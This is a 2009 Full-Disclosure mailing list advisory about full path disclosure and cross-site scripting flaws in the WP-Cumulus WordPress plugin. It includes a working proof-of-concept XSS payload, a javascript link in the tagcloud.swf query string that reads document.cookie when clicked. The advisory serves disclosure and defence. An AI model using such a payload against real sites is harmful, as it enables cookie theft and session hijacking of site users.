[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Vulnerabilities in WP-Cumulus for WordPress
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Vulnerabilities in WP-Cumulus for WordPress
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Tue, 24 Nov 2009 23:56:40 +0200
Hello Full-Disclosure!
I want to warn you about security vulnerabilities in plugin WP-Cumulus for
WordPress.
These are Full path disclosure and Cross-Site Scripting vulnerabilities.
Full path disclosure:
http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php
XSS:
http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Code will execute after click. It's strictly social XSS.
Vulnerable are WP-Cumulus 1.20 and previous versions.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3665/).
P.S.
This is one of that 20 plugins for WordPress where I found 135 different
vulnerabilities (during 2006-2009), which I wrote about in my summary of
vulnerabilities in plugins for WordPress (http://websecurity.com.ua/3397/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/